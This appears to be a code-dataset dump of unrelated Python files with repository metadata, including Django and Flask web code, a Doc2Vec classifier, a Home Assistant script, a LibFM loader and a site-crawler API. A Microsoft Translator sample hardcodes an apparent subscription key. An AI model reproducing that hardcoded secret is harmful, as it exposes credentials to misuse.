application = get_wsgi_application()
|
[
"153192@ids.upchiapas.edu.mx"
] |
153192@ids.upchiapas.edu.mx
|
9ee138622ad76dee330ccb93bd22a7d9a93ce566
|
25d69136cadc3755200160f9005ed17bb13409b8
|
/django_1.5/lib/python2.7/site-packages/django_extensions/management/commands/print_user_for_session.py
|
695c050bd8a2ceb8d5ee0834e810d6e9b69b9cdd
|
[] |
no_license
|
davidmfry/Django_Drag_and_Drop_v1
|
4cc89e767c11313451c77dee6cd206a5ee724b8d
|
5ec9c99acb127c04a241eb81d3df16533b4ce96f
|
refs/heads/master
| 2016-09-03T06:52:52.925510
| 2013-08-12T21:48:33
| 2013-08-12T21:48:33
| 12,006,953
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,688
|
py
|
from django.core.management.base import BaseCommand, CommandError
from django.contrib.auth.models import User
from django.contrib.sessions.models import Session
import re
SESSION_RE = re.compile("^[0-9a-f]{20,40}$")
class Command(BaseCommand):
help = ("print the user information for the provided session key. "
"this is very helpful when trying to track down the person who "
"experienced a site crash.")
args = "session_key"
label = 'session key for the user'
requires_model_validation = True
can_import_settings = True
def handle(self, *args, **options):
if len(args) > 1:
raise CommandError("extra arguments supplied")
if len(args) < 1:
raise CommandError("session_key argument missing")
key = args[0].lower()
if not SESSION_RE.match(key):
raise CommandError("malformed session key")
try:
session = Session.objects.get(pk=key)
except Session.DoesNotExist:
print("Session Key does not exist. Expired?")
return
data = session.get_decoded()
print('Session to Expire: %s' % session.expire_date)
print('Raw Data: %s' % data)
uid = data.get('_auth_user_id', None)
if uid is None:
print('No user associated with session')
return
print("User id: %s" % uid)
try:
user = User.objects.get(pk=uid)
except User.DoesNotExist:
print("No user associated with that id.")
return
for key in ['username', 'email', 'first_name', 'last_name']:
print("%s: %s" % (key, getattr(user, key)))
|
[
"david.fry.tv@gmail.com"
] |
david.fry.tv@gmail.com
|
ecc1d9c5b96ad1abb4fd71a03dabb273bc0e097f
|
d14b2593bad813163e8f2dd5f8996d036ae5576e
|
/DOC2Vec.py
|
eab8d0d53bfaa47fee0826018f3e0c7c54afab99
|
[] |
no_license
|
anbaee/my-P.hD-Code
|
36f1f9c84249d98842cbcec1be0c6a9a1adffd1f
|
a61360aadd4269014af32836c0cc3297fca921a8
|
refs/heads/master
| 2021-06-25T00:05:47.965826
| 2021-01-22T05:31:38
| 2021-01-22T05:31:38
| 199,577,199
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,935
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 29 06:58:39 2020
@author: Novin
"""
import pandas as pd
from gensim.test.utils import common_texts
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
from sklearn.metrics import accuracy_score, f1_score
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn import utils
from sklearn import svm
import csv
from tqdm import tqdm
import multiprocessing
import nltk
from nltk.corpus import stopwords
import numpy as np
from sklearn.svm import SVC
from sklearn.metrics import confusion_matrix,classification_report
import time
def tokenize_text(text):
tokens = []
for sent in nltk.sent_tokenize(text):
for word in nltk.word_tokenize(sent):
if len(word) < 2:
continue
tokens.append(word.lower())
return tokens
tqdm.pandas(desc="progress-bar")
# Initializing the variables
df = pd.read_csv('CF output - Copy.csv')
tags_index = {'down': 1 , 'up': 2}
y = df['label60']
data = []
for rowIndex,row in df.iterrows():
x = tokenize_text(str(row['title']) + str(row['articleBody']))
print(tags_index[row['label60']])
data.append(TaggedDocument(words = x , tags = [tags_index[row['label60']]]))
train_documents, test_documents, y_train, y_test = train_test_split(data, y, test_size=0.2)
# Initializing the variables
# doc2vec prepare
cores = multiprocessing.cpu_count()
model_dbow = Doc2Vec(dm=1, vector_size=210, negative=5, hs=0, min_count=3, sample = 0, workers=cores, alpha=0.025, min_alpha=0.001)
model_dbow.build_vocab([x for x in tqdm(train_documents)])
#train_documents = utils.shuffle(train_documents)
model_dbow.train(train_documents,total_examples=len(train_documents), epochs=30)
def vector_for_learning(model, input_docs):
sents = input_docs
targets, feature_vectors = zip(*[(doc.tags[0], model.infer_vector(doc.words, steps=20)) for doc in sents])
return targets, feature_vectors
model_dbow.save('./forexModel.d2v')
y_train, X_train = vector_for_learning(model_dbow, train_documents)
y_test, X_test = vector_for_learning(model_dbow, test_documents)
clf = svm.SVC(random_state=42 , gamma = 'auto')
print("Default Parameters are: \n",clf.get_params)
start_time = time.time()
clf.fit(X_train, y_train)
fittime = time.time() - start_time
print("Time consumed to fit model: ",time.strftime("%H:%M:%S", time.gmtime(fittime)))
start_time = time.time()
score=clf.score(X_test, y_test)
print("Accuracy: ",score)
y_pred = clf.predict(X_test)
scoretime = time.time() - start_time
print("Time consumed to score: ",time.strftime("%H:%M:%S", time.gmtime(scoretime)))
case1=[score,fittime,scoretime]
print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
|
[
"noreply@github.com"
] |
anbaee.noreply@github.com
|
0701ad1ecfb95fdccd9375d3d3a6e07fe46f47a7
|
a42c5a34aaabe8bc04bfd4104d16f7ca74afd733
|
/numba_ized_split_1024_1/RFMC_stacking.py
|
2311a4056e897f1a4f7e1e739c8ce1ef282d45b1
|
[] |
no_license
|
devkimg1/spin-glass-order
|
ab06e708a399f380ff303125785b47c507783673
|
3b49327b3308a94983e5fb5aee7abd29d9ddbde1
|
refs/heads/main
| 2023-04-21T00:37:53.442564
| 2021-05-20T13:12:17
| 2021-05-20T13:12:17
| 330,023,721
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,054
|
py
|
'''
'''
import numpy as np
import pickle
import os
class RFMC():
model: None
energy_series: None
time_series: None
steps = int(0)
def __init__(self, model):
self.model = model
self.rng = np.random.default_rng()
#self.energy_series = np.empty(1,dtype='int')
#self.time_series = np.empty(1,dtype='float')
self.steps = 0
self.next_run_number = 0
if not os.path.exists(('runs/%dx%d_%1.2f'%(self.model.n_x,self.model.n_y,self.model.T)).replace('.','-')):
os.makedirs(('runs/%dx%d_%1.2f'%(self.model.n_x,self.model.n_y,self.model.T)).replace('.','-'))
pass
def run(self, steps):
steps = int(steps)
energy_series = np.zeros(steps)
time_series = np.zeros(steps)
# The iterations ignore the first state. This is an arbitrary choice
for i in range(steps):
self.steps += 1
step = self.move_selection()
self.model.glass_update(step)
self.model.energy_update(step)
self.model.probability_update(step)
time_series[i] = self.time_calculation(self.model.rate())
energy_series[i] = self.model._energy
pickle.dump(energy_series,open(('runs/%dx%d_%1.2f/energy_%d'%(self.model.n_x,self.model.n_y,self.model.T,self.next_run_number)).replace('.','-')+'.p','wb'))
pickle.dump(time_series,open(('runs/%dx%d_%1.2f/time_%d'%(self.model.n_x,self.model.n_y,self.model.T,self.next_run_number)).replace('.','-')+'.p','wb'))
self.next_run_number += 1
return
def move_selection(self):
return self.model.move_selection()
def time_calculation(self, rate):
return -np.log(self.rng.uniform())/rate
def get_mean(self):
return np.sum(np.dot(self.energy_series,self.time_series))/np.sum(self.time_series)
def get_sus(self):
mean = self.get_mean()
m2 = np.sum(self.time_series * self.e2_series) / np.sum(self.time_series)
return (m2 - mean**2)/ self.model.T**2
|
[
"devkimg1@gmail.com"
] |
devkimg1@gmail.com
|
69f9b23509152d698020e0cd3642f5f72426c14a
|
679fe3e21889a7f0cee2ab0caa9901859f756a82
|
/python_scripts/get_temp.py
|
a872a02fa141a36605eac8fc614cb94bff05fcde
|
[] |
no_license
|
pasoad/home-assistant-config
|
d5a1e059f6842bc39771bf98cfdb58bf383d98f1
|
8abfea21637878c946495196f98ab2e1f58251ac
|
refs/heads/main
| 2023-02-14T01:37:57.761610
| 2021-01-12T21:35:06
| 2021-01-12T21:35:06
| 314,674,147
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,268
|
py
|
########################################################
### get temp for a room (default: home) ###
### Parameters: ###
### {"entity_id": "cuisine"} ###
########################################################
entity_id = data.get('entity_id').replace(' ', '_').replace('é', 'e').replace('è', 'e')
logger.error("entity_id " + entity_id)
if entity_id:
if entity_id == "dehors":
temp = hass.states.get("sensor.outdoor_temperature").state
service_data = {"text":"Il fait " + temp + " dehors"}
hass.services.call('snips', 'say', service_data)
elif (hass.states.get("sensor."+entity_id) and hass.states.get("sensor."+entity_id).state):
temp = hass.states.get("sensor."+entity_id).state
service_data = {"text":"Il fait " + temp + " dans " + entity_id}
hass.services.call('snips', 'say', service_data)
else:
service_data = {"text":"Impossible de trouver la température de " + data.get('entity_id') + "'"}
hass.services.call('snips', 'say', service_data)
else:
temp = hass.states.get("sensor.current_temperature").state
service_data = {"text":"Il fait " + temp + " degrès dans la maison"}
hass.services.call('snips', 'say', service_data)
|
[
"root@core-ssh.local.hass.io"
] |
root@core-ssh.local.hass.io
|
2301371acf5e18404b4319b791c4a0680e2e82d7
|
9a9af1ccf2e09e53cf52653ad778c0585194d59a
|
/LoadData.py
|
ff91c1479d0d0a09e04d4c5a2e095ebc59528094
|
[] |
no_license
|
weiweijiuzaizhe/neural_factorization_machine
|
1ff28589a2e2a56804a5c4a037ba3c97b51d547d
|
34d3bae1e6e1acfb3015fa8fa0cebefcc5c33553
|
refs/heads/master
| 2021-01-23T02:40:56.766886
| 2017-09-05T06:43:02
| 2017-09-05T06:43:02
| 102,442,242
| 1
| 0
| null | 2017-09-05T06:21:35
| 2017-09-05T06:21:35
| null |
UTF-8
|
Python
| false
| false
| 4,555
|
py
|
'''
Utilities for Loading data.
The input data file follows the same input for LibFM: http://www.libfm.org/libfm-1.42.manual.pdf
@author:
Xiangnan He (xiangnanhe@gmail.com)
Lizi Liao (liaolizi.llz@gmail.com)
@references:
'''
import numpy as np
import os
class LoadData(object):
'''given the path of data, return the data format for DeepFM
:param path
return:
Train_data: a dictionary, 'Y' refers to a list of y values; 'X' refers to a list of features_M dimension vectors with 0 or 1 entries
Test_data: same as Train_data
Validation_data: same as Train_data
'''
# Three files are needed in the path
def __init__(self, path, dataset, loss_type):
self.path = path + dataset + "/"
self.trainfile = self.path + dataset +".train.libfm"
self.testfile = self.path + dataset + ".test.libfm"
self.validationfile = self.path + dataset + ".validation.libfm"
self.features_M = self.map_features( )
self.Train_data, self.Validation_data, self.Test_data = self.construct_data( loss_type )
def map_features(self): # map the feature entries in all files, kept in self.features dictionary
self.features = {}
self.read_features(self.trainfile)
self.read_features(self.testfile)
self.read_features(self.validationfile)
#print("features_M:", len(self.features))
return len(self.features)
def read_features(self, file): # read a feature file
f = open( file )
line = f.readline()
i = len(self.features)
while line:
items = line.strip().split(' ')
for item in items[1:]:
if item not in self.features:
self.features[ item ] = i
i = i + 1
line = f.readline()
f.close()
def construct_data(self, loss_type):
X_, Y_ , Y_for_logloss= self.read_data(self.trainfile)
if loss_type == 'log_loss':
Train_data = self.construct_dataset(X_, Y_for_logloss)
else:
Train_data = self.construct_dataset(X_, Y_)
print("# of training:" , len(Y_))
X_, Y_ , Y_for_logloss= self.read_data(self.validationfile)
if loss_type == 'log_loss':
Validation_data = self.construct_dataset(X_, Y_for_logloss)
else:
Validation_data = self.construct_dataset(X_, Y_)
print("# of validation:", len(Y_))
X_, Y_ , Y_for_logloss = self.read_data(self.testfile)
if loss_type == 'log_loss':
Test_data = self.construct_dataset(X_, Y_for_logloss)
else:
Test_data = self.construct_dataset(X_, Y_)
print("# of test:", len(Y_))
return Train_data, Validation_data, Test_data
def read_data(self, file):
# read a data file. For a row, the first column goes into Y_;
# the other columns become a row in X_ and entries are maped to indexs in self.features
f = open( file )
X_ = []
Y_ = []
Y_for_logloss = []
line = f.readline()
while line:
items = line.strip().split(' ')
Y_.append( 1.0*float(items[0]) )
if float(items[0]) > 0:# > 0 as 1; others as 0
v = 1.0
else:
v = 0.0
Y_for_logloss.append( v )
X_.append( [ self.features[item] for item in items[1:]] )
line = f.readline()
f.close()
return X_, Y_, Y_for_logloss
def construct_dataset(self, X_, Y_):
Data_Dic = {}
X_lens = [ len(line) for line in X_]
indexs = np.argsort(X_lens)
Data_Dic['Y'] = [ Y_[i] for i in indexs]
Data_Dic['X'] = [ X_[i] for i in indexs]
return Data_Dic
def truncate_features(self):
"""
Make sure each feature vector is of the same length
"""
num_variable = len(self.Train_data['X'][0])
for i in xrange(len(self.Train_data['X'])):
num_variable = min([num_variable, len(self.Train_data['X'][i])])
# truncate train, validation and test
for i in xrange(len(self.Train_data['X'])):
self.Train_data['X'][i] = self.Train_data['X'][i][0:num_variable]
for i in xrange(len(self.Validation_data['X'])):
self.Validation_data['X'][i] = self.Validation_data['X'][i][0:num_variable]
for i in xrange(len(self.Test_data['X'])):
self.Test_data['X'][i] = self.Test_data['X'][i][0:num_variable]
return num_variable
|
[
"tonyfd26@foxmail.com"
] |
tonyfd26@foxmail.com
|
1f817c1a4c68aded1a7453d94d21585b9cfcf484
|
2bdedcda705f6dcf45a1e9a090377f892bcb58bb
|
/src/main/output/lot/reason_right_java_home_group/nano/back/friend/eye_woman.py
|
80dd2dbabd5e68ad4e9304971d2c2c0ec2b44984
|
[] |
no_license
|
matkosoric/GenericNameTesting
|
860a22af1098dda9ea9e24a1fc681bb728aa2d69
|
03f4a38229c28bc6d83258e5a84fce4b189d5f00
|
refs/heads/master
| 2021-01-08T22:35:20.022350
| 2020-02-21T11:28:21
| 2020-02-21T11:28:21
| 242,123,053
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,144
|
py
|
# -*- coding: utf-8 -*-
import http.client, urllib.parse
# **********************************************
# *** Update or verify the following values. ***
# **********************************************
# Replace the subscriptionKey string value with your valid subscription key.
host = 'api.microsofttranslator.com'
path = '/V2/Http.svc/TranslateArray'
params = ''
ns = "http://schemas.microsoft.com/2003/10/Serialization/Arrays";
# NOTE: AppId is required, but it can be empty because we are sending the Ocp-Apim-Subscription-Key header.
body = """
<TranslateArrayRequest>
<AppId />
<Texts>
<string xmlns=\"%s\">Hello</string>
<string xmlns=\"%s\">Goodbye</string>
</Texts>
<To>fr-fr</To>
</TranslateArrayRequest>
""" % (ns, ns)
def TranslateArray ():
subscriptionKey = '0dfdfd17470115f2e6ba2026db3b0aa8'
headers = {
'1208c17c7b1df1b04ac60ad8a3296ba2': subscriptionKey,
'Content-type': 'text/xml'
}
conn = http.client.HTTPSConnection(host)
conn.request ("POST", path + params, body, headers)
response = conn.getresponse ()
return response.read ()
result = TranslateArray ()
print (result.decode("utf-8"))
|
[
"soric.matko@gmail.com"
] |
soric.matko@gmail.com
|
98480ecb3b245791516942cd51aa2d2ac7ba7374
|
895a6bdccb009d4a12d0cf3187f8b7eec8231b98
|
/app/auth/views.py
|
3034125ef4a929ba6398de554fa11b2c40b823eb
|
[] |
no_license
|
luke202001/supervisor_admin_web
|
d1022ddffad6702f3b21a613203c44aa857cdb00
|
176ee2691cb765896b7d05220c666b1c46c88aa4
|
refs/heads/master
| 2020-06-02T22:14:10.866752
| 2017-09-25T03:00:21
| 2017-09-25T03:00:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,137
|
py
|
#!/usr/bin/env python
# coding=utf-8
from flask import url_for, redirect, render_template, flash
from flask_login import login_user, login_required, logout_user
from .models import User, singleton_admin
from . import auth
from .forms import LoginForm
from supervisior_lib.supervisor import singleton_supervisor as supervisor
@auth.route("/login", methods=["GET", "POST"])
def login():
form = LoginForm()
if form.validate_on_submit():
username = form.username.data
password = form.password.data
if "admin"== username and singleton_admin.verify_password(password):
login_user(singleton_admin)
return redirect(url_for("home.index"))
else:
flash(u"登录失败", category="error")
return render_template("auth/login.html", form=form)
@auth.route("/logout")
@login_required
def logout():
logout_user()
return redirect(url_for("auth.login"))
from app import login_manager
@login_manager.user_loader
def load_user(user_id):
user_id = int(user_id)
if 0==user_id:
return singleton_admin
return User.query.get(user_id)
|
[
"pl01665077@163.com"
] |
pl01665077@163.com
|
2991297e99f021c28cdc081b5e023c710836abb8
|
1234b1ca300661391633438bf231bd80570e1a84
|
/ListTest.py
|
2abc1dc6d67a97a4cf99b528a4abd8e60e4c9212
|
[] |
no_license
|
Taohong01/OCR
|
e70780e4d876142bcfea1711422d58e4d1db3d7d
|
39c798c4947344585d6b644a2d37fb7729b773e6
|
refs/heads/master
| 2020-06-14T17:28:46.822030
| 2017-11-28T04:46:31
| 2017-11-28T04:46:31
| 38,499,317
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 306
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 25 09:30:46 2015
@author: Tao
"""
def extendList(val, list=[]):
list.append(val)
return list
list1 = extendList(10)
list2 = extendList(123,[])
list3 = extendList('a')
print "list1 = %s" % list1
print "list2 = %s" % list2
print "list3 = %s" % list3
|
[
"taohong01@gmail.com"
] |
taohong01@gmail.com
|
962d14a6ac64178dbe6bdf09c2c85a8e1eb29226
|
44ab0c77d7af687b63fb403485f1c5ca39da57ec
|
/backend/blueprints/sites.py
|
3b35604f4d01bcf14af49ab56ff2ec9311990a5e
|
[
"Apache-2.0"
] |
permissive
|
dmitryro/flask-swagger-api
|
22b3387b72880e16d75c523cce385bc0c9574cfb
|
f4449f998e6cd6ec7793304cdeea5c1f870938aa
|
refs/heads/master
| 2022-03-05T04:03:44.751160
| 2020-06-09T03:35:15
| 2020-06-09T03:35:15
| 241,054,587
| 0
| 0
| null | 2022-02-10T22:55:20
| 2020-02-17T08:22:20
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 15,333
|
py
|
#################
#### imports ####
#################
from datetime import datetime
from flask import Blueprint, Flask, json, jsonify, render_template, request, url_for, make_response
from flask import current_app
from flasgger import Swagger
from flask_api import status # HTTP Status Codes
from werkzeug.local import LocalProxy
from worker import celery
import celery.states as states
from models.sites import Site, SiteSchema
from models.sites import Page, PageSchema
from models.actions import Form, FormSchema
from models.actions import FormField, FormFieldSchema
from utils.spide import crawl, internal_urls, get_all_page_forms
from utils.session import obtain_session
sites_blueprint = Blueprint('sites', __name__, template_folder='templates')
logger = LocalProxy(lambda: current_app.logger)
@sites_blueprint.route("/crawled/<int:id>", methods=['GET'])
def get_crawled(id):
"""
Retrieve a single Site
This endpoint will return a Site based on it's id
---
tags:
- Crawled
produces:
- application/json
parameters:
- name: id
in: path
description: ID of site to read crawled pages
type: integer
required: true
responses:
200:
description: Site forms crawled
schema:
$ref: '#/definitions/Site'
404:
description: Site not found
"""
try:
s = obtain_session()
site = s.query(Site).get(id)
host = site.host
port = site.port
pages = s.query(Page).filter(Page.site_id==id)
site_schema = SiteSchema(many=False)
form_schema = FormSchema(many=True)
page_schema = PageSchema(many=True)
pages = []
stored_forms = {}
stored_fields = {}
for page in pages:
link = f"{base_url}{page.name}"
forms = s.query(Form).filter(Form.page_id==page.id)
for i, form in enumerate(forms):
stored_fields[f'fields_{page.id}_{i}'] = form.fields
forms_result = form_schema.dump(forms)
stored_forms[f'forms_{page.id}'] = forms_result
pages_result = page_schema.dump(pages)
for page in pages_result:
forms = stored_forms[f'forms_{page_id}']
for i, form in enumerate(forms):
form_id = form.get('id')
fields = stored_fields[f'fields_{page_id}_{i}']
form['fields'] = fields
page['forms'] = forms
result = site_schema.dump(site)
result['pages'] = pages_result
logger.debug(f"Successfully read the crawled site {id}")
return make_response(jsonify(result), status.HTTP_200_OK)
except Exception as e:
logger.error(f"Error reading the crawled site {id} - {e}")
result = {"error": str(e)}
return make_response(jsonify(result), status.HTTP_500_INTERNAL_SERVER_ERROR)
@sites_blueprint.route("/crawl/<int:id>", methods=['GET'])
def get_elements(id):
"""
Retrieve a single Site
This endpoint will return a Site based on it's id
---
tags:
- Crawl
produces:
- application/json
parameters:
- name: id
in: path
description: ID of site to crawl
type: integer
required: true
responses:
200:
description: Site forms crawled
schema:
$ref: '#/definitions/Site'
404:
description: Site not found
"""
try:
base_url = "https://lovehate.io"
s = obtain_session()
site = s.query(Site).get(id)
host = site.host
port = site.port
site_links = crawl(base_url, max_urls=20)
crawled_pages = list(site_links)
site_schema = SiteSchema(many=False)
form_schema = FormSchema(many=True)
page_schema = PageSchema(many=True)
pages = []
for page in crawled_pages:
p = Page(name=page, site_id=site.id)
s.add(p)
pages.append(p)
s.commit()
s.flush()
stored_forms = {}
stored_fields = {}
for page in pages:
link = f"{base_url}{page.name}"
crawled_forms = get_all_page_forms(link)
forms = []
for i, form in enumerate(crawled_forms):
f = Form(name=form.get('name',''),
method=form.get('method', ''),
action=form.get('action', ''),
form_id=form.get('id',''),
page_id=page.id)
s.add(f)
forms.append(f)
form_id = form.get('form_id')
stored_fields[f'fields_{page.id}_{i}'] = form['fields']
s.commit()
s.flush()
forms_result = form_schema.dump(forms)
stored_forms[f'forms_{page.id}'] = forms_result
stored_forms[f'forms_{page.id}_crawled'] = crawled_forms
pages_result = page_schema.dump(pages)
for page in pages_result:
page_id = page.get('id')
forms = stored_forms[f'forms_{page_id}']
crawled_forms = stored_forms[f'forms_{page_id}_crawled']
for i, form in enumerate(forms):
form_id = form.get('id')
fields = stored_fields[f'fields_{page_id}_{i}']
form['fields'] = fields
page['forms'] = forms
result = site_schema.dump(site)
result['pages'] = pages_result
logger.debug(f"Successfully crawled the site {id}")
return make_response(jsonify(result), status.HTTP_200_OK)
except Exception as e:
logger.error(f"Error crawling the site {id} - {e}")
result = {"error": str(e)}
return make_response(jsonify(result), status.HTTP_500_INTERNAL_SERVER_ERROR)
@sites_blueprint.route("/sites/<int:id>", methods=['GET'])
def get_sites(id):
"""
Retrieve a single Site
This endpoint will return a Site based on it's id
---
tags:
- Sites
produces:
- application/json
parameters:
- name: id
in: path
description: ID of site to retrieve
type: integer
required: true
responses:
200:
description: Site returned
schema:
$ref: '#/definitions/Site'
404:
description: Site not found
"""
try:
logger.debug(f"Reading the site {id} ...")
sess = obtain_session()
site = sess.query(Site).get(id)
logger.debug(f"SITE WAS ----------> {site}")
pages = sess.query(Page).filter(Page.site_id==site.id)
page_schema = PageSchema(many=True)
site_schema = SiteSchema(many=False)
pages_result = page_schema.dump(pages)
result = site_schema.dump(site)
result['pages'] = pages_result
return make_response(jsonify(result), status.HTTP_200_OK)
except Exception as e:
logger.error(f"Error reading the site {id} - {e}")
result = {"error": str(e)}
return make_response(jsonify(result), status.HTTP_500_INTERNAL_SERVER_ERROR)
@sites_blueprint.route("/sites", methods=['POST'])
def create_site():
"""
Creates a Site
This endpoint will create a Site based the data in the body that is posted
---
tags:
- Sites
consumes:
- application/json
produces:
- application/json
parameters:
- in: body
name: body
required: true
schema:
id: site_data
required:
- host
properties:
host:
type: string
description: Site host
port:
type: integer
description: Site port
ga:
type: string
description: Google Analytics
responses:
201:
description: Site created
schema:
$ref: '#/definitions/Site'
400:
description: Bad Request (the posted data was not valid)
"""
try:
data = request.json
ga = data.get("ga", "")
host = data.get("host", "")
port = data.get("port", "80")
site = Site(host=host,
port=int(port),
ga=ga)
base_url = f"https://{host}"
base_url = "https://lovehate.io"
l = []
s = obtain_session()
s.add(site)
s.commit()
site_schema = SiteSchema(many=False)
result = site_schema.dump(site)
logger.debug(f"Saved new site {host} {port}")
return make_response(jsonify(result), status.HTTP_201_CREATED)
except Exception as e:
logger.error(f"Failed saving site - {e}")
result = {"result": "failure"}
return make_response(jsonify(result), status.HTTP_500_INTERNAL_SERVER_ERROR)
@sites_blueprint.route("/sites", methods=['GET'])
def list_sites():
"""
Retrieve a list of Sites
This endpoint will return all Sites unless a query parameter is specificed
---
tags:
- Sites
description: The Sites endpoint allows you to query Sites
definitions:
Site:
type: object
properties:
host:
type: string
description: Host of the site
port:
type: string
description: Port of the site
responses:
200:
description: An array of Sites
schema:
type: array
items:
schema:
$ref: '#/definitions/Site'
"""
logger.debug("Reading the list of all the sites ...")
sess = obtain_session()
all_sites = sess.query(Site).all()
sites_schema = SiteSchema(many=True)
result = sites_schema.dump(all_sites)
return make_response(jsonify(result), status.HTTP_200_OK)
@sites_blueprint.route("/pages/<int:site_id>", methods=['GET'])
def get_pages(site_id):
"""
Retrieve a single Page by Site ID
This endpoint will return a Page based on it's site_id
---
tags:
- Pages
produces:
- application/json
parameters:
- name: site_id
in: path
description: ID of site to retrieve
type: integer
required: true
responses:
200:
description: Site returned
schema:
$ref: '#/definitions/Page'
404:
description: Site not found
"""
logger.debug(f"Reading the list of pages for site id {site_id}...")
sess = obtain_session()
pages = sess.query(Page).filter_by(site_id=site_id)
page_schema = PageSchema(many=True)
result = page_schema.dump(pages)
return make_response(jsonify(result), status.HTTP_200_OK)
@sites_blueprint.route("/pages", methods=['GET'])
def list_pages():
"""
Retrieve a list of Pages
This endpoint will return all Sites unless a query parameter is specificed
---
tags:
- Pages
description: The Sites endpoint allows you to query Sites
definitions:
Site:
type: object
properties:
name:
type: string
description: Page name
meta:
type: string
description: Page meta
headers:
type: string
description: Page headers
site_id:
type: integer
description: Site ID
responses:
200:
description: An array of Sites
schema:
type: array
items:
schema:
$ref: '#/definitions/Page'
"""
logger.debug("Reading the list of all pages ...")
sess = obtain_session()
all_pages = sess.query(Page).all()
pages_schema = PageSchema(many=True)
result = pages_schema.dump(all_pages)
return make_response(jsonify(result), status.HTTP_200_OK)
@sites_blueprint.route("/sites/<int:id>", methods=['DELETE'])
def delete_site(id):
"""
Delete a Site
This endpoint will delete a Site based the id specified in the path
---
tags:
- Sites
description: Deletes a Site from the database
parameters:
- name: id
in: path
description: ID of site to delete
type: integer
required: true
responses:
204:
description: Site deleted
"""
try:
sess = obtain_session()
site = sess.query(Site).get(id)
logger.debug(f"Deleting site {id} ...")
if site:
sess.delete(site)
sess.commit()
sess.flush()
result = {"result": "success"}
return make_response(jsonify(result), status.HTTP_204_NO_CONTENT)
except Exception as e:
logger.error(f"Error deleting the site {id} - {e}")
result = {"result": "failure"}
return make_response(jsonify(result), status.HTTP_500_INTERNAL_SERVER_ERROR)
@sites_blueprint.route("/forms", methods=['GET'])
def list_forms():
"""
Retrieve a list of Forms
This endpoint will return all Sites unless a query parameter is specificed
---
tags:
- Forms
description: The Sites endpoint allows you to query Sites
definitions:
Form:
type: object
properties:
id:
type: integer
description: Form id
action:
type: string
desctiption: Form action
method:
type: string
description: Method (POST/GET/PUT)
form_id:
type: string
description: Form text ID
name:
type: string
description: Form name
page_id:
type: integer
description: Page ID
responses:
200:
description: An array of Sites
schema:
type: array
items:
schema:
$ref: '#/definitions/Form'
"""
logger.debug("Reading the list of forms ...")
sess = obtain_session()
all_forms = sess.query(Form).all()
forms_schema = FormSchema(many=True)
result = forms_schema.dump(all_forms)
return make_response(jsonify(result), status.HTTP_200_OK)
@sites_blueprint.route("/forms/<int:page_id>", methods=['GET'])
def get_forms(page_id):
"""
Retrieve a single Form by Page ID
This endpoint will return a Form based on it's page_id
---
tags:
- Forms
produces:
- application/json
parameters:
- name: page_id
in: path
description: ID of site to retrieve
type: integer
required: true
responses:
200:
description: Form returned
schema:
$ref: '#/definitions/Form'
404:
description: Page not found
"""
try:
logger.debug(f"Reading the list of forms for page {page_id} ...")
sess = obtain_session()
forms = sess.query(Form).filter_by(page_id=page_id)
form_schema = FormSchema(many=True)
result = form_schema.dump(forms)
return make_response(jsonify(result), status.HTTP_200_OK)
except Exception as e:
logger.error(f"Error reading forms for page {page_id} - {e}")
result = {"result": "failure"}
return make_response(jsonify(result), status.HTTP_500_INTERNAL_SERVER_ERROR)
|
[
"dmitryro@gmail.com"
] |
dmitryro@gmail.com
|
81e6a5da98a24959afbf6675d09f710eb53bf804
|
ec5e752eea3fa9becb613a4b71e5a49066536df4
|
/Play-ON/store.py
|
1d27f0ffa7ed87324aeb1fd8470341d9eeced01c
|
[] |
no_license
|
Yeshwanth-1985/play-on
|
eab0afdaebdf43d1dd95e0491635168808f53940
|
2cbc929f2b727a005ecf09a7a7a1cccfeed38ae2
|
refs/heads/master
| 2023-06-11T02:08:28.534677
| 2021-07-03T13:33:55
| 2021-07-03T13:33:55
| 376,204,894
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 33,503
|
py
|
from flask import Flask, render_template, request, session, redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import or_
from flask_mail import Mail
from werkzeug.utils import secure_filename
from datetime import datetime
import json
import math
import os
import re
local_server = True
with open("config.json", "r") as c:
params = json.load(c)["params"]
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = params["upload_location"]
app.config['song_folder'] = params["song_folder"]
app.config['image_folder'] = params["image_folder"]
app.config['UPLOAD_EXTENSIONS'] = ['.mp3']
app.secret_key = 'super_secret_key'
app.config.update(
MAIL_SERVER="smtp.gmail.com",
MAIL_PORT="465",
MAIL_USE_SSL=True,
MAIL_USERNAME=params["gmail_username"],
MAIL_PASSWORD=params["gmail_password"]
)
mail = Mail(app)
if(local_server):
app.config["SQLALCHEMY_DATABASE_URI"] = params["local_uri"]
else:
app.config["SQLALCHEMY_DATABASE_URI"] = params["prod_uri"]
db = SQLAlchemy(app)
class Songs(db.Model):
sid = db.Column(db.Integer, primary_key=True)
song_name = db.Column(db.String(20), nullable=False)
movie_name = db.Column(db.String(30), nullable=False)
genre = db.Column(db.String(20), nullable=False)
song_lyrics= db.Column(db.String(1000), nullable=False)
slug = db.Column(db.String(20), nullable=False)
song_location = db.Column(db.String(20), nullable=False)
image_location = db.Column(db.String(30), nullable=False)
class Admins(db.Model):
admin_no = db.Column(db.Integer, primary_key=True)
admin_fullname = db.Column(db.String(20), nullable=False)
admin_username = db.Column(db.String(20), nullable=False)
admin_email = db.Column(db.String(30), nullable=False)
admin_password = db.Column(db.String(20), nullable=False)
admin_dob = db.Column(db.Date, nullable=False)
admin_gender = db.Column(db.String(10), nullable=False)
class Contact(db.Model):
sno = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(20), nullable=False)
email = db.Column(db.String(20), nullable=False)
phone_num = db.Column(db.String(12), nullable=False)
